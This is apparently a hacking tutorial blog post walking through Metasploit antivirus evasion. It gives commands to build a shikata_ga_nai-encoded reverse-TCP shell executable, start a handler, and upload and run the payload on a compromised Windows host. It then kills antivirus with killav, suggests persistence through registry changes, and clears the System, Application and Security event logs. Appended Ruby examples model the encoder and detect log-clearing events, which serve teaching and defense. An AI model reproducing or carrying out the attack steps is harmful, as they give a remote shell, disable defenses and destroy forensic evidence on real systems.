So far I have covered some of the basics of a few different things, such as Metasploit and web injection attacks. Now I'm going to cover antivirus bypass with Metasploit. Many of you understand encryption and encoding; with a few commands, the Metasploit framework can apply an encoder to your payload to hide it from antivirus software. Keep in mind that an encoder is not encryption: the decoder stub and its key ship inside the executable, so the only thing hiding the payload is that the encoded bytes no longer match a static signature on the raw payload. AV products have had signatures for the common decoder stubs (shikata_ga_nai's included) for a long time, so on its own this will not get an executable past a current scanner; treat it as a way to beat naive signature matching, not as a general bypass.
1)Let's check out the help menu for the encoder --> ./msfencode -h
2)Now let's see what encoders are offered --> ./msfencode -l
3)The first thing we need to do is pick our payload; I recommend windows/shell/reverse_tcp. It is a staged payload, so the executable only carries a small stager and the rest is sent over the connection and loaded straight into memory, which leaves less on disk for the AV software to match. With the next command, Metasploit will create an encoded executable; if you want to get creative you can have a batch file or similar run it at startup in case the computer gets rebooted.
4)The command --> ./msfpayload windows/shell/reverse_tcp LHOST=<your local ip> LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > tmp/myFile.exe (this can be whatever directory you have in your msf path, and you can name the file whatever you want, with a .exe extension). The R tells msfpayload to emit the raw payload so it can be piped into msfencode; -t exe tells msfencode to wrap the result in a Windows executable instead of writing raw encoded shellcode, and adding -c 5 runs the encoder five times instead of once. Before you run the file on the target, start a listener for it: use exploit/multi/handler, set PAYLOAD windows/shell/reverse_tcp with the same LHOST and LPORT, then exploit. In current Metasploit releases msfpayload and msfencode have been merged into msfvenom; the equivalent is msfvenom -p windows/shell/reverse_tcp LHOST=<your local ip> LPORT=31337 -e x86/shikata_ga_nai -i 5 -f exe -o myFile.exe.
5)Upload the file to the exploited machine (meterpreter's upload command will do), drop to a shell with the shell command, and execute it. The new session arrives at the handler you started; the meterpreter session you uploaded from is a separate one. That's it, or was it? Go back to the meterpreter prompt --> ctrl-c (or type exit in the shell)
6)Let's have some fun with the AV software. You want to kill it so you can't be detected? --> run killav (a meterpreter script that kills processes whose names match its built-in list of AV products; it needs enough privilege to terminate them, and products with self-protection or a watchdog service will come straight back)
7)Let's clear some event logs so we can cover our tracks a bit --> irb (this drops us into an irb shell inside the session, where client is the meterpreter client object, so we can do what we do)
8)Now to clear the system log --> log = client.sys.eventlog.open('system') --> log.clear
9)Application log --> log = client.sys.eventlog.open('application') --> log.clear
10)Security log --> log = client.sys.eventlog.open('security') --> log.clear
Meterpreter's clearev command does these same three clears in one step. Either way, be aware that clearing a log is itself logged in what remains: on Vista and later, wiping the Security log writes event 1102 to Security and wiping any other log writes event 104 to System (on XP/2003 the Security clear shows up as event 517), so a defender who looks will see exactly when the logs were emptied.
11)Now you have an encoded payload connected back to your machine, and you have mangled the AV software until reboot. You can get creative and write a script that disables the AV on startup, so it won't detect anything else you might want to do while you are pentesting the machine. I suggest modifying the registry, which is the simplest to set up and the least visible to the product you just killed. Bear in mind that autostart registry keys and AV service settings are among the first places a responder or an endpoint agent checks, so this hides from the disabled AV, not from anyone reviewing the box afterwards.
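To make the encoding point concrete, here is an added example (written for this page; it is not Metasploit's encoder and emits no x86 code) that models the kind of additive-feedback XOR encoding x86/shikata_ga_nai uses: every 4-byte block is XORed with a 32-bit key, and the key is then advanced by adding the decoded block. The real decoder stub is a short machine-code routine with the key as an immediate operand; here the stub is modelled as a fixed marker string followed by the key, which is enough to show the two things that matter: the encoded body changes with every key (so a signature on the raw payload misses), and the blob still decodes itself with no secret (so the constant stub is what a scanner signatures). The sample payload bytes and the signature strings are constructed for the illustration.

```ruby
require 'securerandom'

# Simplified model of an additive-feedback XOR encoder in the style of
# x86/shikata_ga_nai. Illustration only: not Metasploit's encoder, no x86 output.
MASK32 = 0xFFFFFFFF
STUB_MARKER = "DECODER-STUB:".b   # stands in for the constant decoder instructions

# Pad to a multiple of 4 so the buffer is covered by whole dwords.
def pad4(bytes)
  bytes.b + ("\x90".b * ((4 - bytes.bytesize % 4) % 4))
end

def encode_sgn(plain, key)
  out = "".b
  pad4(plain).unpack("V*").each do |dw|    # little-endian dwords
    out << [dw ^ key].pack("V")
    key = (key + dw) & MASK32              # feedback uses the decoded dword
  end
  out
end

def decode_sgn(blob, key)
  out = "".b
  blob.unpack("V*").each do |dw|
    plain = dw ^ key
    out << [plain].pack("V")
    key = (key + plain) & MASK32           # same key schedule as the encoder
  end
  out
end

# Stub + key + encoded body: everything needed to decode travels in the blob.
def build_blob(plain, key = SecureRandom.random_number(1 << 32))
  STUB_MARKER + [key].pack("V") + encode_sgn(plain, key)
end

# Anyone holding the blob can decode it; no secret is involved.
def decode_blob(blob)
  raise "not an encoded blob" unless blob.start_with?(STUB_MARKER)
  key = blob[STUB_MARKER.bytesize, 4].unpack1("V")
  decode_sgn(blob[(STUB_MARKER.bytesize + 4)..-1], key)
end

# Naive byte-signature scanner of the kind the encoder is meant to beat.
def signature_hit?(buf, sig)
  buf.b.include?(sig.b)
end

# Constructed sample bytes standing in for a raw stager, and a signature on them.
SAMPLE_PAYLOAD = "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0".b
PAYLOAD_SIG    = "\xfc\xe8\x82\x00".b

if __FILE__ == $0
  a = build_blob(SAMPLE_PAYLOAD)
  b = build_blob(SAMPLE_PAYLOAD)
  puts "encoded bodies differ between runs: #{a != b}"
  puts "payload signature hits raw payload: #{signature_hit?(SAMPLE_PAYLOAD, PAYLOAD_SIG)}"
  puts "payload signature hits encoded:     #{signature_hit?(a, PAYLOAD_SIG)}"
  puts "stub signature hits encoded:        #{signature_hit?(a, STUB_MARKER)}"
  puts "decoded without any secret:         #{decode_blob(a).start_with?(SAMPLE_PAYLOAD)}"
end
```

Running it twice gives two different encoded bodies that both fail the payload signature, yet both match the stub marker and both decode back to the same bytes. That is the whole story of encoder-based "bypass": it defeats a signature on the payload body and nothing else.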
Gh0$7
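The log-clearing steps above leave their own trace, and a defender can alert on it. This added example (not part of the original post) runs that detection over a constructed set of exported Windows event records in JSON Lines form: the hostnames, times and user names are made up for the illustration, while the event IDs are the real ones (Security 1102 or, on XP/2003, 517 for a Security clear; System 104 for any other channel, which names the wiped log in its ClearedLog field). It flags every clear and then groups clears on one host that land within two minutes of each other, which is exactly the System, Application, Security sequence the irb commands produce.

```ruby
require 'json'
require 'time'

# Constructed sample of exported Windows event records (JSON Lines). The field
# names follow the usual EVTX export shape; hosts, users and times are made up.
SAMPLE_EVENTS = <<~'JSONL'
  {"TimeCreated":"2010-03-02T14:05:01Z","Computer":"LAB-WS01","Channel":"System","EventID":7036,"Provider":"Service Control Manager","SubjectUserName":"SYSTEM"}
  {"TimeCreated":"2010-03-02T14:05:22Z","Computer":"LAB-WS01","Channel":"Security","EventID":4624,"Provider":"Microsoft-Windows-Security-Auditing","SubjectUserName":"jsmith"}
  {"TimeCreated":"2010-03-02T14:06:10Z","Computer":"LAB-WS01","Channel":"System","EventID":104,"Provider":"Microsoft-Windows-Eventlog","SubjectUserName":"SYSTEM","ClearedLog":"System"}
  {"TimeCreated":"2010-03-02T14:06:11Z","Computer":"LAB-WS01","Channel":"System","EventID":104,"Provider":"Microsoft-Windows-Eventlog","SubjectUserName":"SYSTEM","ClearedLog":"Application"}
  {"TimeCreated":"2010-03-02T14:06:12Z","Computer":"LAB-WS01","Channel":"Security","EventID":1102,"Provider":"Microsoft-Windows-Eventlog","SubjectUserName":"SYSTEM"}
  {"TimeCreated":"2010-03-02T15:40:00Z","Computer":"LAB-WS01","Channel":"Security","EventID":1102,"Provider":"Microsoft-Windows-Eventlog","SubjectUserName":"admin"}
  {"TimeCreated":"2010-03-02T16:02:45Z","Computer":"LAB-XP01","Channel":"Security","EventID":517,"Provider":"Security","SubjectUserName":"SYSTEM"}
JSONL

# What a log clear looks like in the records that survive it.
CLEAR_RULES = [
  { channel: "Security", id: 1102, desc: "Security log cleared" },
  { channel: "Security", id: 517,  desc: "Security log cleared (pre-Vista)" },
  { channel: "System",   id: 104,  desc: "Non-Security log cleared" },
].freeze

def parse_events(jsonl)
  jsonl.each_line.map(&:strip).reject(&:empty?).map { |l| JSON.parse(l) }
end

# One hit per clear event, naming the log that was wiped.
def clear_events(records)
  records.each_with_object([]) do |r, hits|
    rule = CLEAR_RULES.find { |c| c[:channel] == r["Channel"] && c[:id] == r["EventID"] }
    next unless rule
    hits << { time: Time.iso8601(r["TimeCreated"]), host: r["Computer"],
              user: r["SubjectUserName"], log: r["ClearedLog"] || r["Channel"],
              desc: rule[:desc] }
  end
end

# Group clears on the same host that follow the previous one within window_s;
# several logs wiped back to back is the anti-forensics pattern worth an alert.
def clear_bursts(hits, window_s = 120)
  hits.group_by { |h| h[:host] }.flat_map do |host, hs|
    groups = []
    hs.sort_by { |h| h[:time] }.each do |h|
      if groups.empty? || h[:time] - groups.last.last[:time] > window_s
        groups << [h]
      else
        groups.last << h
      end
    end
    groups.select { |g| g.size >= 2 }
          .map { |g| { host: host, start: g.first[:time], logs: g.map { |x| x[:log] } } }
  end
end

if __FILE__ == $0
  hits = clear_events(parse_events(SAMPLE_EVENTS))
  hits.each { |h| puts "#{h[:time].utc.iso8601} #{h[:host]} #{h[:user]}: #{h[:desc]} [#{h[:log]}]" }
  clear_bursts(hits).each do |b|
    puts "ALERT #{b[:host]} at #{b[:start].utc.iso8601}: #{b[:logs].join(', ')} cleared within 2 minutes"
  end
end
```

The lone Security clear by admin at 15:40 is reported as a hit but not as a burst, which is the distinction a rule like this needs: a single clear can be routine maintenance, three logs in three seconds under SYSTEM is not.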